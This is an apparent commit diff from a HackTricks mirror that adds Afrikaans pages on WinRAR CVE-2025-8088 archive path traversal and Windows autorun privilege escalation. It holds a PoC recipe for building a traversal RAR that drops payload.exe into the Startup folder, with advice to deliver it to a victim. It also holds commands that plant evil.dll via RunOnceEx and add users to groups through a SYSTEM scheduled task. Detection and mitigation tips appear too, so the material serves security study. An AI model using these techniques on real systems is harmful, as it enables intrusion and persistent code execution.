maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/generic-hacking/archive-extraction-path-traversal.md',

Browse Source
This commit is contained in:
Translator 2025-08-13 22:16:33 +00:00
parent d32ccc57d7
commit 7e5961aaea
3 changed files with 102 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -79,6 +79,7 @@
# 🧙‍♂️ Generic Hacking
- [Archive Extraction Path Traversal](generic-hacking/archive-extraction-path-traversal.md)
- [Brute Force - CheatSheet](generic-hacking/brute-force.md)
- [Esim Javacard Exploitation](generic-hacking/esim-javacard-exploitation.md)
- [Exfiltration](generic-hacking/exfiltration.md)

68
src/generic-hacking/archive-extraction-path-traversal.md Normal file
View File

@ -0,0 +1,68 @@
# Argief Uittrekking Pad Traversal ("Zip-Slip" / WinRAR CVE-2025-8088)
{{#include ../banners/hacktricks-training.md}}
## Oorsig
Baie argief formate (ZIP, RAR, TAR, 7-ZIP, ens.) laat elke inskrywing toe om sy eie **interne pad** te dra. Wanneer 'n uittrekking hulpmiddel blindelings daardie pad eerbiedig, sal 'n vervaardigde lêernaam wat `..` of 'n **absolute pad** (bv. `C:\Windows\System32\`) bevat, buite die gebruiker-gekose gids geskryf word. Hierdie klas kwesbaarheid is algemeen bekend as *Zip-Slip* of **argief uittrekking pad traversie**.
Gevolge wissel van die oorskryding van arbitrêre lêers tot die direkte bereiking van **afgeleë kode uitvoering (RCE)** deur 'n payload in 'n **auto-run** ligging soos die Windows *Startup* gids te laat val.
## Wortel Oorsaak
1. Aanvaller skep 'n argief waar een of meer lêer koppe bevat:
* Relatiewe traversie volgordes (`..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe`)
* Absolute pades (`C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe`)
2. Slachtoffer trek die argief uit met 'n kwesbare hulpmiddel wat die ingebedde pad vertrou in plaas daarvan om dit te saniteer of om uittrekking onder die gekose gids af te dwing.
3. Die lêer word in die aanvaller-beheerde ligging geskryf en uitgevoer/gelai die volgende keer wanneer die stelsel of gebruiker daardie pad aktiveer.
## Regte-Wêreld Voorbeeld WinRAR ≤ 7.12 (CVE-2025-8088)
WinRAR vir Windows (insluitend die `rar` / `unrar` CLI, die DLL en die draagbare bron) het gefaal om lêernames tydens uittrekking te valideer. 'n Kwaadwillige RAR argief wat 'n inskrywing soos bevat:
```text
..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
```
sal eindig **buite** die geselekte uitvoer gids en binne die gebruiker se *Startup* gids. Na aanmelding voer Windows outomaties alles wat daar teenwoordig is uit, wat *volhoubare* RCE bied.
### Skep 'n PoC Argief (Linux/Mac)
```bash
# Requires rar >= 6.x
mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
rar a -ep evil.rar evil/*
```
Options used:
* `-ep` stoor lêerpaaie presies soos gegee (moet **nie** leiende `./` snoei nie).
Lewer `evil.rar` aan die slagoffer en instrueer hulle om dit met 'n kwesbare WinRAR-bou te onttrek.
### Geobserveerde Exploitatie in die Wild
ESET het RomCom (Storm-0978/UNC2596) spear-phishing veldtogte gerapporteer wat RAR-argiewe aangeheg het wat CVE-2025-8088 misbruik om pasgemaakte agterdeure te ontplooi en ransomware-operasies te fasiliteer.
## Opsporingwenke
* **Statiese inspeksie** Lys argiefinskrywings en merk enige naam wat `../`, `..\\`, *absolute paaie* (`C:`) of nie-kanonical UTF-8/UTF-16 kodering bevat.
* **Sandbox onttrekking** Decomprimeer in 'n weggooibare gids met 'n *veilige* onttrekker (bv. Python se `patool`, 7-Zip ≥ nuutste, `bsdtar`) en verifieer dat die resulterende paaie binne die gids bly.
* **Eindpuntmonitering** Laat weet oor nuwe uitvoerbare lêers wat kort na 'n argief deur WinRAR/7-Zip/etc. geopen word, in `Startup`/`Run` plekke geskryf word.
## Versagting & Versterking
1. **Werk die onttrekker op** WinRAR 7.13 implementeer behoorlike pad-sanitizering. Gebruikers moet dit handmatig aflaai omdat WinRAR 'n outo-opdateringsmeganisme ontbreek.
2. Onttrek argiewe met die **“Ignore paths”** opsie (WinRAR: *Extract → "Do not extract paths"*) wanneer moontlik.
3. Open onbetroubare argiewe **binne 'n sandbox** of VM.
4. Implementeer toepassingswitlyste en beperk gebruikers se skrywe toegang tot outo-loop gidses.
## Addisionele Aangetaste / Historiese Gevalle
* 2018 Massiewe *Zip-Slip* advies deur Snyk wat baie Java/Go/JS biblioteke beïnvloed.
* 2023 7-Zip CVE-2023-4011 soortgelyke traversering tydens `-ao` samesmelting.
* Enige pasgemaakte onttrekkingslogika wat versuim om `PathCanonicalize` / `realpath` voor skryf aan te roep.
## Verwysings
- [BleepingComputer WinRAR zero-day exploited to plant malware on archive extraction](https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/)
- [WinRAR 7.13 Changelog](https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=283&cHash=a64b4a8f662d3639dec8d65f47bc93c5)
- [Snyk Zip Slip vulnerability write-up](https://snyk.io/research/zip-slip-vulnerability)
{{#include ../banners/hacktricks-training.md}}

58
src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
View File

@ -6,7 +6,7 @@
## WMIC
**Wmic** kan gebruik word om programme by **opstart** te loop. Sien watter binaries geprogrammeer is om by opstart te loop met:
**Wmic** kan gebruik word om programme by **opstart** te loop. Sien watter binaire geprogrammeer is om by opstart te loop met:
```bash
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
@ -26,7 +26,7 @@ schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgro
```
## Gids
Alle die binaries wat in die **Startup-gidse geleë is, gaan by opstart uitgevoer word**. Die algemene opstartgidse is diegene wat hieronder gelys is, maar die opstartgids word in die register aangedui. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path)
Alle die binaire lêers wat in die **Startup-gidse geleë is, gaan by opstart uitgevoer word**. Die algemene opstartgidse is diegene wat hieronder gelys is, maar die opstartgids word in die register aangedui. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path)
```bash
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
@ -35,14 +35,22 @@ dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
```
## Registrasie
> **FYI**: Argiefonttrekking *pad traversering* kwesbaarhede (soos die een wat in WinRAR voor 7.13 misbruik is CVE-2025-8088) kan benut word om **payloads direk binne hierdie Startup vouers tydens ontpakking te deponeer**, wat lei tot kode-uitvoering by die volgende gebruiker aanmelding. Vir 'n diep duik in hierdie tegniek, sien:
> [!NOTE]
> [Nota hier vandaan](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): Die **Wow6432Node** registrasie-invoer dui aan dat jy 'n 64-bis Windows weergawe gebruik. Die bedryfstelsel gebruik hierdie sleutel om 'n aparte weergawe van HKEY_LOCAL_MACHINE\SOFTWARE vir 32-bis toepassings wat op 64-bis Windows weergawes loop, te vertoon.
{{#ref}}
../../generic-hacking/archive-extraction-path-traversal.md
{{#endref}}
## Register
> [!TIP]
> [Nota hier vanaf](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): Die **Wow6432Node** registerinskrywing dui aan dat jy 'n 64-bis Windows weergawe uitvoer. Die bedryfstelsel gebruik hierdie sleutel om 'n aparte weergawe van HKEY_LOCAL_MACHINE\SOFTWARE vir 32-bis toepassings wat op 64-bis Windows weergawes loop, te vertoon.
### Loop
**Algemeen bekend** AutoRun registrasie:
**Algemeen bekend** AutoRun register:
- `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
- `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
@ -56,7 +64,7 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
Registrasie sleutels bekend as **Run** en **RunOnce** is ontwerp om outomaties programme uit te voer elke keer wanneer 'n gebruiker in die stelsel aanmeld. Die opdraglyn wat as 'n sleutel se datavalue toegeken word, is beperk tot 260 karakters of minder.
Register sleutels bekend as **Run** en **RunOnce** is ontwerp om outomaties programme uit te voer elke keer wanneer 'n gebruiker in die stelsel aanmeld. Die opdraglyn wat as 'n sleutel se datavalue toegeken word, is beperk tot 260 karakters of minder.
**Diens loop** (kan outomatiese opstart van dienste tydens opstart beheer):
@ -74,15 +82,15 @@ Registrasie sleutels bekend as **Run** en **RunOnce** is ontwerp om outomaties p
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
- `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
Op Windows Vista en later weergawes, word die **Run** en **RunOnce** registrasie sleutels nie outomaties gegenereer nie. Invoere in hierdie sleutels kan of direkte programme begin of hulle as afhanklikhede spesifiseer. Byvoorbeeld, om 'n DLL-lêer by aanmelding te laai, kan 'n mens die **RunOnceEx** registrasie sleutel saam met 'n "Depend" sleutel gebruik. Dit word demonstreer deur 'n registrasie-invoer by te voeg om "C:\temp\evil.dll" tydens die stelselaanloop uit te voer:
Op Windows Vista en later weergawes, word die **Run** en **RunOnce** register sleutels nie outomaties gegenereer nie. Inskrywings in hierdie sleutels kan of direkte programme begin of hulle as afhanklikhede spesifiseer. Byvoorbeeld, om 'n DLL-lêer by aanmelding te laai, kan 'n mens die **RunOnceEx** register sleutel saam met 'n "Depend" sleutel gebruik. Dit word demonstreer deur 'n registerinskrywing toe te voeg om "C:\temp\evil.dll" tydens die stelsel opstart uit te voer:
```
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
```
> [!NOTE]
> **Eksploitasie 1**: As jy binne enige van die genoemde register in **HKLM** kan skryf, kan jy voorregte verhoog wanneer 'n ander gebruiker aanmeld.
> [!TIP]
> **Exploit 1**: As jy binne enige van die genoemde register sleutels in **HKLM** kan skryf, kan jy privaathede verhoog wanneer 'n ander gebruiker aanmeld.
> [!NOTE]
> **Eksploitasie 2**: As jy enige van die binêre wat op enige van die register in **HKLM** aangedui is, kan oorskryf, kan jy daardie binêre met 'n agterdeur wysig wanneer 'n ander gebruiker aanmeld en voorregte verhoog.
> [!TIP]
> **Exploit 2**: As jy enige van die binaire wat op enige van die register sleutels in **HKLM** aangedui is, kan oorskryf, kan jy daardie binêre met 'n backdoor wysig wanneer 'n ander gebruiker aanmeld en privaathede verhoog.
```bash
#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
@ -145,10 +153,10 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\Ru
- `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
- `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
Kortpaaie wat in die **Startup** gids geplaas word, sal outomaties dienste of toepassings aktiveer om te begin tydens gebruikersaanmelding of stelselhervatting. Die ligging van die **Startup** gids is in die register gedefinieer vir beide die **Local Machine** en **Current User** skope. Dit beteken enige kortpad wat by hierdie gespesifiseerde **Startup** plekke gevoeg word, sal verseker dat die gekoppelde diens of program begin na die aanmeld- of herlaai-proses, wat dit 'n eenvoudige metode maak om programme outomaties te skeduleer.
Kortpaaie wat in die **Startup** gids geplaas word, sal outomaties dienste of toepassings aktiveer om tydens gebruikersaanmelding of stelselhervatting te begin. Die ligging van die **Startup** gids word in die register gedefinieer vir beide die **Local Machine** en **Current User** skope. Dit beteken enige kortpad wat by hierdie gespesifiseerde **Startup** plekke gevoeg word, sal verseker dat die gekoppelde diens of program begin na die aanmeld- of herlaai-proses, wat dit 'n eenvoudige metode maak om programme outomaties te skeduleer.
> [!NOTE]
> As jy enige \[User] Shell Folder onder **HKLM** kan oorskryf, sal jy in staat wees om dit na 'n gids wat deur jou beheer word, te wys en 'n backdoor te plaas wat uitgevoer sal word wanneer 'n gebruiker in die stelsel aanmeld, wat privaathede sal verhoog.
> [!TIP]
> As jy enige \[User] Shell Folder onder **HKLM** kan oorskryf, sal jy in staat wees om dit na 'n gids wat deur jou beheer word, te wys en 'n backdoor te plaas wat uitgevoer sal word wanneer 'n gebruiker in die stelsel aanmeld, wat voorregte verhoog.
```bash
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
@ -171,7 +179,7 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
```
> [!NOTE]
> [!TIP]
> As jy die registriewaarde of die binêre kan oorskryf, sal jy in staat wees om voorregte te verhoog.
### Beleid Instellings
@ -190,7 +198,7 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion
### Verandering van die Veilige Modus Opdragprompt
In die Windows Register onder `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, is daar 'n **`AlternateShell`** waarde wat standaard op `cmd.exe` gestel is. Dit beteken wanneer jy "Veilige Modus met Opdragprompt" tydens opstart (deur F8 te druk) kies, word `cmd.exe` gebruik. Maar, dit is moontlik om jou rekenaar op te stel om outomaties in hierdie modus te begin sonder om F8 te druk en dit handmatig te kies.
In die Windows-register onder `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, is daar 'n **`AlternateShell`** waarde wat standaard op `cmd.exe` gestel is. Dit beteken wanneer jy "Veilige Modus met Opdragprompt" tydens opstart (deur F8 te druk), word `cmd.exe` gebruik. Maar, dit is moontlik om jou rekenaar op te stel om outomaties in hierdie modus te begin sonder om F8 te druk en dit handmatig te kies.
Stappe om 'n opstartopsie te skep vir outomatiese begin in "Veilige Modus met Opdragprompt":
@ -200,8 +208,8 @@ Stappe om 'n opstartopsie te skep vir outomatiese begin in "Veilige Modus met Op
4. Stoor veranderinge aan `boot.ini`.
5. Herstel die oorspronklike lêer eienskappe: `attrib c:\boot.ini +r +s +h`
- **Exploit 1:** Die verandering van die **AlternateShell** register sleutel laat vir 'n pasgemaakte opdragskil opstelling toe, moontlik vir ongeoorloofde toegang.
- **Exploit 2 (PATH Skryf Toestemmings):** Om skryf toestemmings te hê na enige deel van die stelsel **PATH** veranderlike, veral voor `C:\Windows\system32`, laat jou toe om 'n pasgemaakte `cmd.exe` uit te voer, wat 'n agterdeur kan wees as die stelsel in Veilige Modus begin.
- **Exploit 1:** Die verandering van die **AlternateShell** register sleutel laat 'n pasgemaakte opdragskuiling opstelling toe, moontlik vir ongeoorloofde toegang.
- **Exploit 2 (PATH Skryf Toestemmings):** Om skryftoestemmings te hê na enige deel van die stelsel **PATH** veranderlike, veral voor `C:\Windows\system32`, laat jou toe om 'n pasgemaakte `cmd.exe` uit te voer, wat 'n agterdeur kan wees as die stelsel in Veilige Modus begin.
- **Exploit 3 (PATH en boot.ini Skryf Toestemmings):** Skryf toegang tot `boot.ini` stel outomatiese Veilige Modus opstart in staat, wat ongeoorloofde toegang op die volgende herbegin vergemaklik.
Om die huidige **AlternateShell** instelling te kontroleer, gebruik hierdie opdragte:
@ -211,7 +219,7 @@ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co
```
### Gemonteerde Komponent
Active Setup is 'n kenmerk in Windows wat **begin voordat die desktopomgewing ten volle gelaai is**. Dit prioritiseer die uitvoering van sekere opdragte, wat moet voltooi voordat die gebruiker se aanmelding voortgaan. Hierdie proses vind plaas selfs voordat ander opstartinvoere, soos dié in die Run of RunOnce registrieseksies, geaktiveer word.
Active Setup is 'n kenmerk in Windows wat **begin voordat die desktopomgewing ten volle gelaai is**. Dit prioritiseer die uitvoering van sekere opdragte, wat moet voltooi voordat die gebruiker se aanmelding voortgaan. Hierdie proses vind plaas selfs voordat ander opstartinge, soos dié in die Run of RunOnce registrieseksies, geaktiveer word.
Active Setup word bestuur deur die volgende registriesleutels:
@ -230,9 +238,9 @@ Binne hierdie sleutels bestaan verskeie subsleutels, elk wat ooreenstem met 'n s
**Sekuriteitsinsigte:**
- Om 'n sleutel te wysig of na 'n sleutel te skryf waar **`IsInstalled`** op `"1"` gestel is met 'n spesifieke **`StubPath`** kan lei tot ongeoorloofde opdraguitvoering, moontlik vir privilige-escalasie.
- Om die binêre lêer wat in enige **`StubPath`** waarde verwys, te verander kan ook privilige-escalasie bereik, gegewe voldoende regte.
- Om die binêre lêer wat in enige **`StubPath`** waarde verwys, te verander kan ook privilige-escalasie bereik, gegewe voldoende toestemmings.
Om die **`StubPath`** konfigurasies oor Active Setup komponente te ondersoek, kan hierdie opdragte gebruik word:
Om die **`StubPath`** konfigurasies oor Active Setup komponente te inspekteer, kan hierdie opdragte gebruik word:
```bash
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
@ -245,7 +253,7 @@ reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
Bladsy Helper Objekte (BHOs) is DLL-modules wat ekstra funksies by Microsoft se Internet Explorer voeg. Hulle laai in Internet Explorer en Windows Explorer by elke begin. Tog kan hul uitvoering geblokkeer word deur die **NoExplorer** sleutel op 1 te stel, wat voorkom dat hulle saam met Windows Explorer instansies laai.
BHOs is versoenbaar met Windows 10 via Internet Explorer 11, maar word nie ondersteun in Microsoft Edge, die standaardblaaier in nuwer weergawes van Windows nie.
BHOs is versoenbaar met Windows 10 via Internet Explorer 11, maar word nie ondersteun in Microsoft Edge, die standaardblaaier in nuwer weergawes van Windows.
Om BHOs wat op 'n stelsel geregistreer is te verken, kan jy die volgende registrasiesleutels inspekteer:
@ -266,7 +274,7 @@ reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\B
Let daarop dat die registrasie 1 nuwe registrasie per elke dll sal bevat en dit sal verteenwoordig word deur die **CLSID**. Jy kan die CLSID-inligting vind in `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`
### Lettertipe bestuurders
### Lettertipe Bestuurders
- `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
- `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
@ -293,7 +301,7 @@ HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Executi
```
## SysInternals
Let daarop dat al die webwerwe waar jy autoruns kan vind **reeds deur**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) gesoek is. egter, vir 'n **meer omvattende lys van outomaties uitgevoerde** lêers kan jy [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) van systinternals gebruik:
Let daarop dat al die webwerwe waar jy autoruns kan vind **reeds deur**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) gesoek is. egter, vir 'n **meer omvattende lys van outomaties uitgevoerde** lêers kan jy [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) van sysinternals gebruik:
```
autorunsc.exe -m -nobanner -a * -ct /accepteula
```